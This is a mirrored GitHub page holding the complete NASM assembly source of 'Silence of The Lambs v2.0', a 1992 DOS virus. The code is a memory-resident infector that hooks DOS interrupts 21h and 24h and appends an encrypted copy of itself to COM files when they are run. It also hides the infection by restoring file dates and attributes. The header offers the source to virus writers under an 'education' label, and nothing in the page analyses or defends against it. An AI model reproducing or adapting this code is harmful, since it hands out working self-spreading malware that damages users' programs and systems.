mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
322 lines
6.9 KiB
NASM
322 lines
6.9 KiB
NASM
|
; Silence of The Lambs v2.0
|
|||
|
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
|
|||
|
;
|
|||
|
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
|
|||
|
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
|
|||
|
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
|
|||
|
; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
|
|||
|
; THE ORIGINAL SOURCE.
|
|||
|
;
|
|||
|
; Assemble With A86
|
|||
|
;
|
|||
|
|
|||
|
org 100h
|
|||
|
jmp short dummy1
|
|||
|
db 'DY'
|
|||
|
dummy1:
|
|||
|
mov cx,length
|
|||
|
mov si,offset enc_start
|
|||
|
mov ah,0
|
|||
|
enc_key equ $-1
|
|||
|
dummy2:
|
|||
|
sub byte [si],ah
|
|||
|
inc si
|
|||
|
add ah,0
|
|||
|
enc_add equ $-1
|
|||
|
loop dummy2
|
|||
|
enc_start:
|
|||
|
mov ah,2Dh
|
|||
|
mov ch,0FFh
|
|||
|
mov dx,cx
|
|||
|
int 21h
|
|||
|
cmp al,0FFh
|
|||
|
jne nomore
|
|||
|
|
|||
|
mov ax,cs
|
|||
|
dec ax
|
|||
|
mov ds,ax
|
|||
|
cmp byte [0],'Z'
|
|||
|
jne nomore
|
|||
|
|
|||
|
mov ax,word [3]
|
|||
|
sub ax,pgfsize
|
|||
|
jc nomore
|
|||
|
sub word [3],pgfsize
|
|||
|
sub word [12h],pgfsize
|
|||
|
|
|||
|
mov es,word [12h]
|
|||
|
mov si,110h
|
|||
|
mov di,100h
|
|||
|
mov cx,total
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov si,84h
|
|||
|
mov di,old21
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
|
|||
|
cli
|
|||
|
mov word [84h+2],es
|
|||
|
mov word [84h],offset ni21
|
|||
|
sti
|
|||
|
|
|||
|
nomore:
|
|||
|
push cs
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
|
|||
|
mov bx,0000h ;return control to the
|
|||
|
eof equ $-2 ;end user
|
|||
|
jmp bx
|
|||
|
|
|||
|
xclose: jmp close
|
|||
|
|
|||
|
infect:
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
|
|||
|
db 0E4h,40h
|
|||
|
mov byte [enc_key],al
|
|||
|
|
|||
|
mov ax,4300h ;use CHMOD to get file attr
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
|
|||
|
mov [0F0h],cx ;store attr in PSP
|
|||
|
|
|||
|
mov ax,4301h ;clear file attr with CHMOD
|
|||
|
xor cx,cx
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,3D02h ;open file for read / write
|
|||
|
int 21h
|
|||
|
xchg bx,ax
|
|||
|
lahf
|
|||
|
push ax
|
|||
|
mov ax,5700h ;get file date & time
|
|||
|
int 21h
|
|||
|
|
|||
|
mov [0F2h],cx
|
|||
|
mov [0F4h],dx
|
|||
|
pop ax
|
|||
|
sahf
|
|||
|
jc xclose
|
|||
|
|
|||
|
mov ah,3Fh ;read from file
|
|||
|
mov cx,total
|
|||
|
mov dx,old
|
|||
|
int 21h
|
|||
|
|
|||
|
cmp byte [old+0],'M' ;exe MZ ?
|
|||
|
je xclose
|
|||
|
cmp byte [old+0],'Z' ;exe ZM ?
|
|||
|
je xclose
|
|||
|
cmp word [old+2],'YD' ;allready infected?
|
|||
|
je xclose
|
|||
|
|
|||
|
mov ax,4202h ;lseek to EOF
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
|
|||
|
cmp ah,0FAh
|
|||
|
jae xclose
|
|||
|
cmp ah,4
|
|||
|
jb xclose
|
|||
|
|
|||
|
add ax,total+100h
|
|||
|
mov word [00F6h],ax
|
|||
|
|
|||
|
mov ah,40h ;write to EOF
|
|||
|
mov cx,total
|
|||
|
mov dx,old
|
|||
|
|
|||
|
push cx
|
|||
|
mov al,byte [enc_key]
|
|||
|
mov si,dx
|
|||
|
enc_app:
|
|||
|
xor byte [si],al
|
|||
|
inc si
|
|||
|
loop enc_app
|
|||
|
pop cx
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,40h ;write to EOF
|
|||
|
mov cx,applen
|
|||
|
mov dx,offset append
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,4200h ;lseek to beginning of file
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
|
|||
|
push [eof]
|
|||
|
mov ax,word [00F6h]
|
|||
|
mov [eof],ax
|
|||
|
|
|||
|
mov ah,byte [enc_key]
|
|||
|
db 0E4h,40h
|
|||
|
mov byte [enc_add],al
|
|||
|
mov dl,al
|
|||
|
|
|||
|
mov si,100h
|
|||
|
mov di,old
|
|||
|
|
|||
|
cld
|
|||
|
mov cx,offset enc_start-100h
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov cx,length
|
|||
|
enc:
|
|||
|
lodsb
|
|||
|
add al,ah
|
|||
|
stosb
|
|||
|
add ah,dl
|
|||
|
loop enc
|
|||
|
|
|||
|
mov ah,40h ;write viral code
|
|||
|
mov dx,old
|
|||
|
mov cx,total
|
|||
|
int 21h
|
|||
|
|
|||
|
pop [eof]
|
|||
|
close:
|
|||
|
mov ax,5701h
|
|||
|
mov cx,[00F2h]
|
|||
|
mov dx,[00F4h]
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,3Eh ;close file
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,4301h
|
|||
|
mov cx,[00F0h]
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
|
|||
|
append:
|
|||
|
call $+3 ;replace org bytes
|
|||
|
pop si
|
|||
|
sub si,3+total
|
|||
|
mov di,100h
|
|||
|
mov cx,total
|
|||
|
mov ah,byte [enc_key]
|
|||
|
append_enc:
|
|||
|
lodsb
|
|||
|
xor al,ah
|
|||
|
stosb
|
|||
|
loop append_enc
|
|||
|
|
|||
|
mov ax,100h ;return IP to 100h when done
|
|||
|
push ax
|
|||
|
|
|||
|
sub ax,ax ;zero regs
|
|||
|
xor bx,bx
|
|||
|
and cx,cx
|
|||
|
sub dx,dx
|
|||
|
xor si,si
|
|||
|
and di,di
|
|||
|
sub bp,bp
|
|||
|
|
|||
|
ret
|
|||
|
applen equ $-offset append
|
|||
|
|
|||
|
ni21:
|
|||
|
pushf
|
|||
|
cmp ah,2Dh
|
|||
|
jne Not_Time
|
|||
|
cmp ch,0FFh
|
|||
|
jne Not_Time
|
|||
|
cmp ch,dh
|
|||
|
jne Not_time
|
|||
|
|
|||
|
mov Al,0
|
|||
|
popf
|
|||
|
iret
|
|||
|
Not_Time:
|
|||
|
cld
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push bp
|
|||
|
push es
|
|||
|
push ds
|
|||
|
|
|||
|
; cmp ah,41h
|
|||
|
; jne Not_Parse
|
|||
|
; mov ah,3Ch
|
|||
|
; cli
|
|||
|
; add sp,18
|
|||
|
; sti
|
|||
|
; popf
|
|||
|
; jmp old21-1
|
|||
|
|
|||
|
Not_Parse:
|
|||
|
cmp ax,4B00h
|
|||
|
jne Not_Exec
|
|||
|
|
|||
|
mov si,dx
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
xor di,di
|
|||
|
mov cx,128
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov ax,3524h
|
|||
|
int 21h
|
|||
|
push es
|
|||
|
push bx
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ax,2524h
|
|||
|
mov dx,offset ni24
|
|||
|
int 21h
|
|||
|
|
|||
|
call infect
|
|||
|
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
mov ax,2524h
|
|||
|
int 21h
|
|||
|
|
|||
|
Not_Exec:
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
pop bp
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
jmp far 0000:0000
|
|||
|
old21 equ $-4
|
|||
|
|
|||
|
ni24: mov al,0
|
|||
|
iret
|
|||
|
|
|||
|
db 'The Silence Of The Lambs!$'
|
|||
|
|
|||
|
total equ $-100h ;size
|
|||
|
pgfsize equ (($*2)/16)+2
|
|||
|
length equ $-offset enc_start
|
|||
|
|
|||
|
old equ $
|
|||
|
|
|||
|
|
|||
|
|